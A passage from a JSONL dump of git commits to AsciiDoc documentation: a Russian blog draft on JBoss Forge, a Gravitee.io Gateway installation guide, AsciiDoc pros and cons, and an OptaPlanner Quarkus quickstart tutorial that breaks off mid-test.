\u0441\u0433\u0435\u043d\u0435\u0440\u0438\u0440\u043e\u0432\u0430\u043b\u0438\u0441\u044c \u0432\u044c\u044e\u0445\u0438, \u0442\u0430\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f JSTL! \u0425\u043e\u0442\u044f \u0438 BalusC \u0438 \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0439 Oracle, \u043a\u0430\u0436\u0435\u0442\u0441\u044f, \u0443\u0436\u0435 \u0433\u043e\u0432\u043e\u0440\u044f\u0442 \u0432 \u0444\u0435\u0439\u0441\u0430\u0445 \u0437\u0430\u0431\u0443\u0434\u044c\u0442\u0435 \u043f\u0440\u043e JSTL. \u0422\u0430\u043c \u0441\u0432\u043e\u0451 \u0443\u0436\u0435 \u0435\u0441\u0442\u044c, \u0442\u043e \u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0439\u0442\u0435.\n \n[NOTE]\n====\n\u0412\u043e\u0442 \u0442\u0443\u0442 \u043d\u0430\u043a\u043e\u043d\u0435\u0446, \u044f \u043d\u0430\u0448\u0435\u043b \u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u044b\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u043a\u0443\u0437\u043d\u0438 http:\/\/forge.jboss.org\/document\/hands-on-lab\n====\n","old_contents":"= \u041a\u0443\u0437\u043d\u044f, \u0430 \u0432\u0435\u0434\u044c \u0443\u0434\u043e\u0431\u043d\u043e. (JBoss Forge)\n:hp-tags: \u043f\u043e\u043b\u0435\u0437\u043d\u044f\u0448\u043a\u0438, \u0447\u0435\u0440\u043d\u043e\u0432\u0438\u043a\n\n\u041f\u0440\u043e\u0431\u0443\u044e \u043f\u043e \u043a\u043d\u0438\u0436\u043a\u0435 \u043f\u043e\u043a\u0430\u0447\u0430\u0442\u044c\u0441\u044f \u0434\u043e \u0431\u0435\u0441\u043f\u0440\u0435\u0440\u044b\u0432\u043d\u043e\u0439 \u0438\u043d\u0442\u0435\u0433\u0440\u0430\u0446\u0438\u0438 http:\/\/bit.ly\/1XLMRZZ[Continuous Enterprise Development in Java _by Andrew Lee Rubinger, Aslak Knutsen_] . \u0418 \u0432\u043e\u0442 \u0442\u0430\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043a\u0443\u0437\u043d\u044f. \u0421\u0442\u043e\u043b\u044c\u043a\u043e \u0440\u0443\u0442\u0438\u043d\u044b \u0443\u0436\u0435 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043d\u043e. \u0412\u0435\u0434\u044c \u0443\u0434\u043e\u0431\u043d\u043e. \u041d\u0430\u0434\u043e \u043f\u043e\u043a\u043e\u043f\u0430\u0442\u044c \u0434\u0430\u043b\u044c\u0448\u0435. \u0422\u0443\u0442 \u0432\u0435\u0434\u044c \u0438 \u0442\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0438\u043d\u0442\u0435\u0433\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0435 \u0443\u0434\u043e\u0431\u043d\u0435\u0435. \u041d\u0443 \u0442.\u0435. \u0440\u0430\u0441\u043f\u0438\u0441\u0430\u043d\u043e \u043a\u0430\u043a \u0441\u0434\u0435\u043b\u0430\u0442\u044c.\n\n*\u0427\u0442\u043e \u043f\u043e\u043d\u0440\u0430\u0432\u0438\u043b\u043e\u0441\u044c:*\n\n . \u041e\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0448\u044c \u043f\u043e\u0447\u0442\u0438 \u0447\u0435\u043b\u043e\u0432\u0435\u0447\u0435\u0441\u043a\u0438\u043c \u044f\u0437\u044b\u043a\u043e\u043c\n . \u0418\u043d\u043a\u0440\u0435\u043c\u0435\u043d\u0442\u0430\u043b\u044c\u043d\u043e\u0435 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u043f\u0440\u043e\u0435\u043a\u0442\u0430\n . \u0414\u043e\u0432\u043e\u043b\u044c\u043d\u043e \u0442\u043e\u043d\u043a\u0430\u044f \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0430\n . \u0412\u044b\u0431\u043e\u0440 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0439 \u0438\u0444\u0440\u0435\u0439\u043c\u0432\u043e\u0440\u043a\u043e\u0432\n . \u0425\u043e\u0440\u043e\u0448\u0430\u044f \u043f\u043e\u0434\u0441\u043a\u0430\u0437\u043a\u0430 \u043f\u043e <TAB>, \u043f\u043e \u043d\u0435\u0439 \u0432 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u043c \u0438 \u0443\u0447\u0443\u0441\u044c.\n . \u041f\u043e \u043f\u0440\u043e\u0435\u043a\u0442\u0443 \u0433\u0443\u043b\u044f\u0435\u0448\u044c \u043a\u0430\u043a \u043f\u043e \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0435 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u043e\u0432 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435, \u0442\u0435 \u043f\u043e\u043b\u043e\u0432\u0438\u043d\u0430 \u043a\u043e\u043c\u0430\u043d\u0434 \u0443\u0436\u0435 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u0442\u0441\u044f \u0437\u043d\u0430\u0435\u0448\u044c.\n\n*\u041d\u0435 \u043f\u043e\u043d\u0440\u0430\u0432\u0438\u043b\u043e\u0441\u044c:*\n_\u041f\u043e \u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0443\u0447\u0443\u0441\u044c \u043f\u043e \u043a\u043d\u0438\u0433\u0435, \u0442\u043e \u043a\u043d\u0438\u0433\u0430 \u0443\u0441\u0442\u0430\u0440\u0435\u043b\u0430. \u041d\u043e \u0438 \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0439 \u0441\u0430\u0439\u0442 \u0442\u043e\u0436\u0435 \u0443\u0441\u0442\u0430\u0440\u0435\u043b. \u041f\u0440\u0438\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u0438\u0434\u0442\u0438 \u043f\u043e\u0447\u0442\u0438 \u0432 \u0441\u043b\u0435\u043f\u0443\u044e. \u0412 \u043a\u043d\u0438\u0433\u0435 \u043e\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0432\u0435\u0440\u0441\u0438\u044f 1 \u0438\u043b\u0438 2, \u043d\u0430 \u0441\u0430\u0439\u0442\u0435 \u0432\u0435\u0440\u0441\u0438\u044f 3. \u0422\u043e \u0447\u0442\u043e \u0441\u043a\u0430\u0447\u0430\u043b\u043e\u0441\u044c jboss IDE \u0442\u0430\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f 3.0.1 \u043a\u0430\u0436\u0435\u0442\u0441\u044f. \u0418 \u043e\u043d\u043e \u043e\u0442\u043b\u0438\u0447\u0430\u0435\u0442\u0441\u044f \u043e\u0442 \u0432\u0435\u0440\u0441\u0438\u0438 3, \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u044e\u0442 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0441\u0432\u043e\u0439\u0441\u0442\u0432\u0430._\n \n . \u0425\u043e\u0442\u044c \u044f \u0438 \u0432\u044b\u0431\u0440\u0430\u043b scaffolding faces 2.2, \u043a\u043e\u0433\u0434\u0430 \u0441\u0433\u0435\u043d\u0435\u0440\u0438\u0440\u043e\u0432\u0430\u043b\u0438\u0441\u044c \u0432\u044c\u044e\u0445\u0438, \u0442\u0430\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f JSTL! \u0425\u043e\u0442\u044f \u0438 BalusC \u0438 \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0439 Oracle, \u043a\u0430\u0436\u0435\u0442\u0441\u044f, \u0443\u0436\u0435 \u0433\u043e\u0432\u043e\u0440\u044f\u0442 \u0432 \u0444\u0435\u0439\u0441\u0430\u0445 \u0437\u0430\u0431\u0443\u0434\u044c\u0442\u0435 \u043f\u0440\u043e JSTL. \u0422\u0430\u043c \u0441\u0432\u043e\u0451 \u0443\u0436\u0435 \u0435\u0441\u0442\u044c, \u0442\u043e \u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0439\u0442\u0435.\n \n[NOTE]\n====\n\u0412\u043e\u0442 \u0442\u0443\u0442 \u043d\u0430\u043a\u043e\u043d\u0435\u0446, \u044f \u043d\u0430\u0448\u0435\u043b \u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u044b\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u043a\u0443\u0437\u043d\u0438 http:\/\/forge.jboss.org\/document\/hands-on-lab\n====\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"072391e26a53823a78d9d5543311d78d19d5bd50","subject":"Internal link typo","message":"Internal link typo\n","repos":"gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs","old_file":"pages\/apim\/installation-guide\/installation-guide-gateway.adoc","new_file":"pages\/apim\/installation-guide\/installation-guide-gateway.adoc","new_contents":"= Gateway\n:page-sidebar: apim_sidebar\n:page-permalink: apim_installguide_gateway.html\n:page-folder: apim\/installation-guide\n\n== System Requirements\n\n=== JDK\n\nGravitee.io Gateway requires at least Java 8. Before you install Gravitee.io Gateway, please check your Java version :\n\n[source,bash]\n----\njava -version\necho $JAVA_HOME\n----\n\nNOTE: You can download the latest JDK from the http:\/\/www.oracle.com\/technetwork\/java\/javase\/downloads\/index.html[Oracle Java SE Download Site].\n\n=== Datastore\n\nDefault Gravitee.io Gateway distribution requires MongoDB 3.x to store management and configuration data and Elasticsearch 2.x to store\nreporting \/ analytics.\n\nNOTE: You can download MongoDB 3.x from the https:\/\/www.mongodb.org\/downloads#production[MongoDB Download Site]\nand Elasticsearch 2.x from the https:\/\/www.elastic.co\/downloads\/elasticsearch[Elastic Download Site]\n\nWARNING: Gravitee.io is not yet compatible with Elasticsearch 5.x. See https:\/\/github.com\/gravitee-io\/issues\/issues\/387[ES 5.x support issue].\n\n== Installing from the ZIP archive\n\nBinaries are available from https:\/\/gravitee.io\/downloads\/full-stack\/latest\/[Downloads page] or via https:\/\/dl.bintray.com\/gravitee-io\/release\/GRAVITEEIO-VERSION\/graviteeio-full-GRAVITEEIO-VERSION.zip[Bintray].\n\n[source,bash]\n[subs=\"attributes\"]\n$ curl -L https:\/\/dl.bintray.com\/gravitee-io\/release\/GRAVITEEIO-VERSION\/:graviteeio-full-GRAVITEEIO-VERSION.zip -o gravitee-standalone-distribution-GRAVITEEIO-VERSION.zip\n\nOnce file has been downloaded, you just have to unpack it in the right place.\n\n[source,bash]\n[subs=\"attributes\"]\n$ unzip gravitee-standalone-distribution-GRAVITEEIO-VERSION.zip\n\nAnd you can simply start up the gateway as follow:\n\n[source,bash]\n[subs=\"attributes\"]\n$ cd graviteeio-gateway-GRAVITEEIO-VERSION\n$ .\/bin\/gravitee\n\nIf everything goes well, you should see this kind of logs:\n\n[source,bash]\n[subs=\"attributes\"]\n...\n20:55:42.097 [gravitee] INFO i.g.g.s.vertx.VertxEmbeddedContainer - Starting Vertx container and deploy Gravitee Verticles\n20:55:42.108 [gravitee] INFO i.g.g.s.v.GraviteeVerticleFactory - Creating a new instance of Gravitee Verticle\n20:55:42.167 [gravitee] INFO i.g.g.standalone.node.GatewayNode - Gravitee.io - Gateway [id: 9c31b9cc-f779-4f2d-b1b9-ccf779df2df5 - version: GRAVITEEIO-VERSION (build: XXXX) revision#XXXX] started in 3871 ms.\n...\n\nBy default, the gateway is listening on port *8082* and can be accessed from: _http:\/\/localhost:8082_\n\n\nHTTP port can be <<apim_installguide_configuration.adoc#http_server, configured>> if necessary.\n\n== Directory structure\n\nAfter successfully installed Gravitee.io Gateway, the `graviteeio-gateway` directory looks like this:\n\n[width=\"100%\",cols=\"20%,80%\",frame=\"topbot\",options=\"header\"]\n|======================\n|Folder |Description\n|bin |Startup\/shutdown scripts\n|config |<<apim_installguide_configuration.adoc#gravitee-gateway-configuration, Configuration>> folder (application, logs and cache configuration)\n|lib |Libraries (gravitee.io libraries and third parties library)\n|logs |Gateway log files\n|plugins |Gateway <<apim_overview_plugins.adoc#, plugins>>\n|======================\n\n","old_contents":"= Gateway\n:page-sidebar: apim_sidebar\n:page-permalink: apim_installguide_gateway.html\n:page-folder: apim\/installation-guide\n\n== System Requirements\n\n=== JDK\n\nGravitee.io Gateway requires at least Java 8. Before you install Gravitee.io Gateway, please check your Java version :\n\n[source,bash]\n----\njava -version\necho $JAVA_HOME\n----\n\nNOTE: You can download the latest JDK from the http:\/\/www.oracle.com\/technetwork\/java\/javase\/downloads\/index.html[Oracle Java SE Download Site].\n\n=== Datastore\n\nDefault Gravitee.io Gateway distribution requires MongoDB 3.x to store management and configuration data and Elasticsearch 2.x to store\nreporting \/ analytics.\n\nNOTE: You can download MongoDB 3.x from the https:\/\/www.mongodb.org\/downloads#production[MongoDB Download Site]\nand Elasticsearch 2.x from the https:\/\/www.elastic.co\/downloads\/elasticsearch[Elastic Download Site]\n\nWARNING: Gravitee.io is not yet compatible with Elasticsearch 5.x. See https:\/\/github.com\/gravitee-io\/issues\/issues\/387[ES 5.x support issue].\n\n== Installing from the ZIP archive\n\nBinaries are available from https:\/\/gravitee.io\/downloads\/full-stack\/latest\/[Downloads page] or via https:\/\/dl.bintray.com\/gravitee-io\/release\/GRAVITEEIO-VERSION\/graviteeio-full-GRAVITEEIO-VERSION.zip[Bintray].\n\n[source,bash]\n[subs=\"attributes\"]\n$ curl -L https:\/\/dl.bintray.com\/gravitee-io\/release\/GRAVITEEIO-VERSION\/:graviteeio-full-GRAVITEEIO-VERSION.zip -o gravitee-standalone-distribution-GRAVITEEIO-VERSION.zip\n\nOnce file has been downloaded, you just have to unpack it in the right place.\n\n[source,bash]\n[subs=\"attributes\"]\n$ unzip gravitee-standalone-distribution-GRAVITEEIO-VERSION.zip\n\nAnd you can simply start up the gateway as follow:\n\n[source,bash]\n[subs=\"attributes\"]\n$ cd graviteeio-gateway-GRAVITEEIO-VERSION\n$ .\/bin\/gravitee\n\nIf everything goes well, you should see this kind of logs:\n\n[source,bash]\n[subs=\"attributes\"]\n...\n20:55:42.097 [gravitee] INFO i.g.g.s.vertx.VertxEmbeddedContainer - Starting Vertx container and deploy Gravitee Verticles\n20:55:42.108 [gravitee] INFO i.g.g.s.v.GraviteeVerticleFactory - Creating a new instance of Gravitee Verticle\n20:55:42.167 [gravitee] INFO i.g.g.standalone.node.GatewayNode - Gravitee.io - Gateway [id: 9c31b9cc-f779-4f2d-b1b9-ccf779df2df5 - version: GRAVITEEIO-VERSION (build: XXXX) revision#XXXX] started in 3871 ms.\n...\n\nBy default, the gateway is listening on port *8082* and can be accessed from: _http:\/\/localhost:8082_\n\n\nHTTP port can be <<apim_installguide_configuration.adoc#http_server, configured>> if necessary.\n\n== Directory structure\n\nAfter successfully installed Gravitee.io Gateway, the `graviteeio-gateway` directory looks like this:\n\n[width=\"100%\",cols=\"20%,80%\",frame=\"topbot\",options=\"header\"]\n|======================\n|Folder |Description\n|bin |Startup\/shutdown scripts\n|config |<<apim_installguide_configuration.adoc#gravitee-gateway-configuration, Configuration>> folder (application, logs and cache configuration)\n|lib |Libraries (gravitee.io libraries and third parties library)\n|logs |Gateway log files\n|plugins |Gateway <<apim_overview_plugins.adoc, plugins>>\n|======================\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c3d3e2278aab342df1ba3422aefb3018dbbcef86","subject":"Add some more asciidoc pros","message":"Add some more asciidoc pros\n","repos":"jeaye\/jeaye.github.io,jeaye\/jeaye.github.io","old_file":"_drafts\/asciidoc.adoc","new_file":"_drafts\/asciidoc.adoc","new_contents":"== Pros\n\n* Multiline support (table cells, list elements, etc)\n* Code references\n* Styling without html\n* Github support\n* Conversion to other formats\n\n== Cons\n\n* Vim support is worse\n* Source blocks are harder to write\n* Bulleted lists are spaced more apart https:\/\/github.com\/asciidoctor\/asciidoctor\/issues\/1087\n\n== Notes\n\n* Vim highlighting and link following\n* Jekyll plugin necessary\n","old_contents":"== Pros\n\n* Multiline support (table cells, list elements, etc)\n* Code references\n* Styling without html\n\n== Cons\n\n* Vim support is worse\n* Source blocks are harder to write\n* Bulleted lists are spaced more apart https:\/\/github.com\/asciidoctor\/asciidoctor\/issues\/1087\n\n== Notes\n\n* Vim highlighting and link following\n* Jekyll plugin necessary\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"9a416682af68095ee392609aa82179e7ab5dad23","subject":"Fix broken links in quarkus docs","message":"Fix broken links in quarkus docs\n","repos":"baldimir\/optaplanner,baldimir\/optaplanner,tkobayas\/optaplanner,tkobayas\/optaplanner,tkobayas\/optaplanner,tkobayas\/optaplanner,baldimir\/optaplanner,baldimir\/optaplanner","old_file":"optaplanner-docs\/src\/modules\/ROOT\/pages\/quickstart\/quarkus\/quarkus-quickstart.adoc","new_file":"optaplanner-docs\/src\/modules\/ROOT\/pages\/quickstart\/quarkus\/quarkus-quickstart.adoc","new_contents":"[[quarkusJavaQuickStart]]\n= Quarkus Java quick start\n:doctype: book\n:imagesdir: ..\/..\n:sectnums:\n:icons: font\n:quickstartsCloneUrl: https:\/\/github.com\/kiegroup\/optaplanner-quickstarts\n:quickstartsArchiveUrl: https:\/\/www.optaplanner.org\/download\/download.html\n:quarkusQuickstartUrl: https:\/\/github.com\/kiegroup\/optaplanner-quickstarts\/tree\/stable\/use-cases\/school-timetabling\n\n\/\/ Keep this in sync with the quarkus repo's copy\n\/\/ https:\/\/github.com\/quarkusio\/quarkus\/blob\/main\/docs\/src\/main\/asciidoc\/optaplanner.adoc\n\/\/ Keep this also in sync with spring-boot-quickstart.adoc where applicable\n\nThis guide walks you through the process of creating a https:\/\/quarkus.io\/[Quarkus] application\nwith https:\/\/www.optaplanner.org\/[OptaPlanner]'s constraint solving Artificial Intelligence (AI).\n\n== What you will build\n\nYou will build a REST application that optimizes a school timetable for students and teachers:\n\nimage::quickstart\/school-timetabling\/schoolTimetablingScreenshot.png[]\n\nYour service will assign `Lesson` instances to `Timeslot` and `Room` instances automatically\nby using AI to adhere to hard and soft scheduling _constraints_, such as the following examples:\n\n* A room can have at most one lesson at the same time.\n* A teacher can teach at most one lesson at the same time.\n* A student can attend at most one lesson at the same time.\n* A teacher prefers to teach all lessons in the same room.\n* A teacher prefers to teach sequential lessons and dislikes gaps between lessons.\n* A student dislikes sequential lessons on the same subject.\n\nMathematically speaking, school timetabling is an _NP-hard_ problem.\nThis means it is difficult to scale.\nSimply brute force iterating through all possible combinations takes millions of years\nfor a non-trivial dataset, even on a supercomputer.\nLuckily, AI constraint solvers such as OptaPlanner have advanced algorithms\nthat deliver a near-optimal solution in a reasonable amount of time.\n\n== Solution source code\n\nFollow the instructions in the next sections to create the application step by step (recommended).\n\nAlternatively, you can also skip right to the completed example:\n\n. Clone the Git repository:\n+\n[source,shell,subs=attributes+]\n----\n$ git clone {quickstartsCloneUrl}\n----\n+\nor download an {quickstartsArchiveUrl}[archive].\n\n. Find the solution in {quarkusQuickstartUrl}[the `use-cases` directory]\nand run it (see its README file).\n\n== Prerequisites\n\nTo complete this guide, you need:\n\n* https:\/\/adoptopenjdk.net\/[JDK] {java-version}+ with `JAVA_HOME` configured appropriately\n* https:\/\/maven.apache.org\/download.html[Apache Maven] {maven-version}+ or https:\/\/gradle.org\/install\/[Gradle] 4+\n* An IDE, such as https:\/\/www.jetbrains.com\/idea[IntelliJ IDEA], VSCode or Eclipse\n\n== The build file and the dependencies\n\nUse https:\/\/code.quarkus.io\/[code.quarkus.io] to generate an application\nwith the following extensions, for Maven or Gradle:\n\n* RESTEasy JAX-RS (`quarkus-resteasy`)\n* RESTEasy Jackson (`quarkus-resteasy-jackson`)\n* OptaPlanner (`optaplanner-quarkus`)\n* OptaPlanner Jackson (`optaplanner-quarkus-jackson`)\n\nAlternatively, generate it from the command line with Maven:\n\n[source,shell,subs=attributes+]\n----\n$ mvn io.quarkus:quarkus-maven-plugin:{quarkus-version}:create \\\n -DprojectGroupId=org.acme \\\n -DprojectArtifactId=optaplanner-quickstart \\\n -Dextensions=\"resteasy,resteasy-jackson,optaplanner-quarkus,optaplanner-quarkus-jackson\" \\\n -DnoExamples\n$ cd optaplanner-quickstart\n----\n\nIn Maven, your `pom.xml` file contains these dependencies:\n\n[source,xml,subs=attributes+]\n----\n <dependencyManagement>\n <dependencies>\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-universe-bom<\/artifactId>\n <version>{quarkus-version}<\/version>\n <type>pom<\/type>\n <scope>import<\/scope>\n <\/dependency>\n <\/dependencies>\n <\/dependencyManagement>\n <dependencies>\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-resteasy<\/artifactId>\n <\/dependency>\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-resteasy-jackson<\/artifactId>\n <\/dependency>\n <dependency>\n <groupId>org.optaplanner<\/groupId>\n <artifactId>optaplanner-quarkus<\/artifactId>\n <\/dependency>\n <dependency>\n <groupId>org.optaplanner<\/groupId>\n <artifactId>optaplanner-quarkus-jackson<\/artifactId>\n <\/dependency>\n\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-junit5<\/artifactId>\n <scope>test<\/scope>\n <\/dependency>\n <\/dependencies>\n----\n\n\/\/On the other hand, in Gradle, your `build.gradle` file contains these dependencies:\n\/\/\n\/\/[source,groovy,subs=attributes+]\n\/\/----\n\/\/dependencies {\n\/\/ implementation enforcedPlatform(\"io.quarkus:quarkus-universe-bom:{quarkus-version}\")\n\/\/ implementation 'io.quarkus:quarkus-resteasy'\n\/\/ implementation 'io.quarkus:quarkus-resteasy-jackson'\n\/\/ implementation 'org.optaplanner:optaplanner-quarkus'\n\/\/ implementation 'org.optaplanner:optaplanner-quarkus-jackson'\n\/\/\n\/\/ testImplementation 'io.quarkus:quarkus-junit5'\n\/\/}\n\/\/----\n\ninclude::..\/school-timetabling\/school-timetabling-model.adoc[leveloffset=+1]\ninclude::..\/school-timetabling\/school-timetabling-constraints.adoc[leveloffset=+1]\ninclude::..\/school-timetabling\/school-timetabling-solution.adoc[leveloffset=+1]\n\n== Create the solver service\n\nNow you are ready to put everything together and create a REST service.\nBut solving planning problems on REST threads causes HTTP timeout issues.\nTherefore, the Quarkus extension injects a `SolverManager` instance,\nwhich runs solvers in a separate thread pool\nand can solve multiple datasets in parallel.\n\nCreate the `src\/main\/java\/org\/acme\/schooltimetabling\/rest\/TimeTableResource.java` class:\n\n[source,java]\n----\npackage org.acme.schooltimetabling.rest;\n\nimport java.util.UUID;\nimport java.util.concurrent.ExecutionException;\nimport javax.inject.Inject;\nimport javax.ws.rs.POST;\nimport javax.ws.rs.Path;\n\nimport org.acme.schooltimetabling.domain.TimeTable;\nimport org.optaplanner.core.api.solver.SolverJob;\nimport org.optaplanner.core.api.solver.SolverManager;\n\n@Path(\"\/timeTable\")\npublic class TimeTableResource {\n\n @Inject\n SolverManager<TimeTable, UUID> solverManager;\n\n @POST\n @Path(\"\/solve\")\n public TimeTable solve(TimeTable problem) {\n UUID problemId = UUID.randomUUID();\n \/\/ Submit the problem to start solving\n SolverJob<TimeTable, UUID> solverJob = solverManager.solve(problemId, problem);\n TimeTable solution;\n try {\n \/\/ Wait until the solving ends\n solution = solverJob.getFinalBestSolution();\n } catch (InterruptedException | ExecutionException e) {\n throw new IllegalStateException(\"Solving failed.\", e);\n }\n return solution;\n }\n\n}\n----\n\nFor simplicity's sake, this initial implementation waits for the solver to finish,\nwhich can still cause an HTTP timeout.\nThe _complete_ implementation avoids HTTP timeouts much more elegantly.\n\n== Set the termination time\n\nWithout a termination setting or a `terminationEarly()` event, the solver runs forever.\nTo avoid that, limit the solving time to five seconds.\nThat is short enough to avoid the HTTP timeout.\n\nCreate the `src\/main\/resources\/application.properties` file:\n\n[source,properties]\n----\n# The solver runs only for 5 seconds to avoid a HTTP timeout in this simple implementation.\n# It's recommended to run for at least 5 minutes (\"5m\") otherwise.\nquarkus.optaplanner.solver.termination.spent-limit=5s\n----\n\nOptaPlanner returns _the best solution_ found in the available termination time.\nDue to xref:optimization-algorithms\/optimization-algorithms.adoc#doesPlannerFindTheOptimalSolution[the nature of NP-hard problems],\nthe best solution might not be optimal, especially for larger datasets.\nIncrease the termination time to potentially find a better solution.\n\n== Run the application\n\nFirst start the application:\n\n[source,shell]\n----\n$ mvn compile quarkus:dev\n----\n\n=== Try the application\n\nNow that the application is running, you can test the REST service.\nYou can use any REST client you wish.\nThe following example uses the Linux command `curl` to send a POST request:\n\n[source,shell]\n----\n$ curl -i -X POST http:\/\/localhost:8080\/timeTable\/solve -H \"Content-Type:application\/json\" -d '{\"timeslotList\":[{\"dayOfWeek\":\"MONDAY\",\"startTime\":\"08:30:00\",\"endTime\":\"09:30:00\"},{\"dayOfWeek\":\"MONDAY\",\"startTime\":\"09:30:00\",\"endTime\":\"10:30:00\"}],\"roomList\":[{\"name\":\"Room A\"},{\"name\":\"Room B\"}],\"lessonList\":[{\"id\":1,\"subject\":\"Math\",\"teacher\":\"A. Turing\",\"studentGroup\":\"9th grade\"},{\"id\":2,\"subject\":\"Chemistry\",\"teacher\":\"M. Curie\",\"studentGroup\":\"9th grade\"},{\"id\":3,\"subject\":\"French\",\"teacher\":\"M. Curie\",\"studentGroup\":\"10th grade\"},{\"id\":4,\"subject\":\"History\",\"teacher\":\"I. Jones\",\"studentGroup\":\"10th grade\"}]}'\n----\n\nAfter about five seconds, according to the termination spent time defined in your `application.properties`,\nthe service returns an output similar to the following example:\n\n[source]\n----\nHTTP\/1.1 200\nContent-Type: application\/json\n...\n\n{\"timeslotList\":...,\"roomList\":...,\"lessonList\":[{\"id\":1,\"subject\":\"Math\",\"teacher\":\"A. Turing\",\"studentGroup\":\"9th grade\",\"timeslot\":{\"dayOfWeek\":\"MONDAY\",\"startTime\":\"08:30:00\",\"endTime\":\"09:30:00\"},\"room\":{\"name\":\"Room A\"}},{\"id\":2,\"subject\":\"Chemistry\",\"teacher\":\"M. Curie\",\"studentGroup\":\"9th grade\",\"timeslot\":{\"dayOfWeek\":\"MONDAY\",\"startTime\":\"09:30:00\",\"endTime\":\"10:30:00\"},\"room\":{\"name\":\"Room A\"}},{\"id\":3,\"subject\":\"French\",\"teacher\":\"M. Curie\",\"studentGroup\":\"10th grade\",\"timeslot\":{\"dayOfWeek\":\"MONDAY\",\"startTime\":\"08:30:00\",\"endTime\":\"09:30:00\"},\"room\":{\"name\":\"Room B\"}},{\"id\":4,\"subject\":\"History\",\"teacher\":\"I. Jones\",\"studentGroup\":\"10th grade\",\"timeslot\":{\"dayOfWeek\":\"MONDAY\",\"startTime\":\"09:30:00\",\"endTime\":\"10:30:00\"},\"room\":{\"name\":\"Room B\"}}],\"score\":\"0hard\/0soft\"}\n----\n\nNotice that your application assigned all four lessons to one of the two time slots and one of the two rooms.\nAlso notice that it conforms to all hard constraints.\nFor example, M. Curie's two lessons are in different time slots.\n\nOn the server side, the `info` log shows what OptaPlanner did in those five seconds:\n\n[source,options=\"nowrap\"]\n----\n... Solving started: time spent (33), best score (-8init\/0hard\/0soft), environment mode (REPRODUCIBLE), random (JDK with seed 0).\n... Construction Heuristic phase (0) ended: time spent (73), best score (0hard\/0soft), score calculation speed (459\/sec), step total (4).\n... Local Search phase (1) ended: time spent (5000), best score (0hard\/0soft), score calculation speed (28949\/sec), step total (28398).\n... Solving ended: time spent (5000), best score (0hard\/0soft), score calculation speed (28524\/sec), phase total (2), environment mode (REPRODUCIBLE).\n----\n\n=== Test the application\n\nA good application includes test coverage.\n\n==== Test the constraints\n\nTo test each constraint in isolation, use a `ConstraintVerifier` in unit tests.\nIt tests each constraint's corner cases in isolation from the other tests,\nwhich lowers maintenance when adding a new constraint with proper test coverage.\n\nAdd a `optaplanner-test` dependency in your `pom.xml`:\n[source,xml]\n----\n <dependency>\n <groupId>org.optaplanner<\/groupId>\n <artifactId>optaplanner-test<\/artifactId>\n <scope>test<\/scope>\n <\/dependency>\n----\n\nCreate the `src\/test\/java\/org\/acme\/schooltimetabling\/solver\/TimeTableConstraintProviderTest.java` class:\n\n[source,java]\n----\npackage org.acme.schooltimetabling.solver;\n\nimport java.time.DayOfWeek;\nimport java.time.LocalTime;\n\nimport javax.inject.Inject;\n\nimport io.quarkus.test.junit.QuarkusTest;\nimport org.acme.schooltimetabling.domain.Lesson;\nimport org.acme.schooltimetabling.domain.Room;\nimport org.acme.schooltimetabling.domain.TimeTable;\nimport org.acme.schooltimetabling.domain.Timeslot;\nimport org.junit.jupiter.api.Test;\nimport org.optaplanner.test.api.score.stream.ConstraintVerifier;\n\n@QuarkusTest\nclass TimeTableConstraintProviderTest {\n\n private static final Room ROOM = new Room(\"Room1\");\n private static final Timeslot TIMESLOT1 = new Timeslot(DayOfWeek.MONDAY, LocalTime.of(9,0), LocalTime.NOON);\n private static final Timeslot TIMESLOT2 = new Timeslot(DayOfWeek.TUESDAY, LocalTime.of(9,0), LocalTime.NOON);\n\n @Inject\n ConstraintVerifier<TimeTableConstraintProvider, TimeTable> constraintVerifier;\n\n @Test\n void roomConflict() {\n Lesson firstLesson = new Lesson(1, \"Subject1\", \"Teacher1\", \"Group1\");\n Lesson conflictingLesson 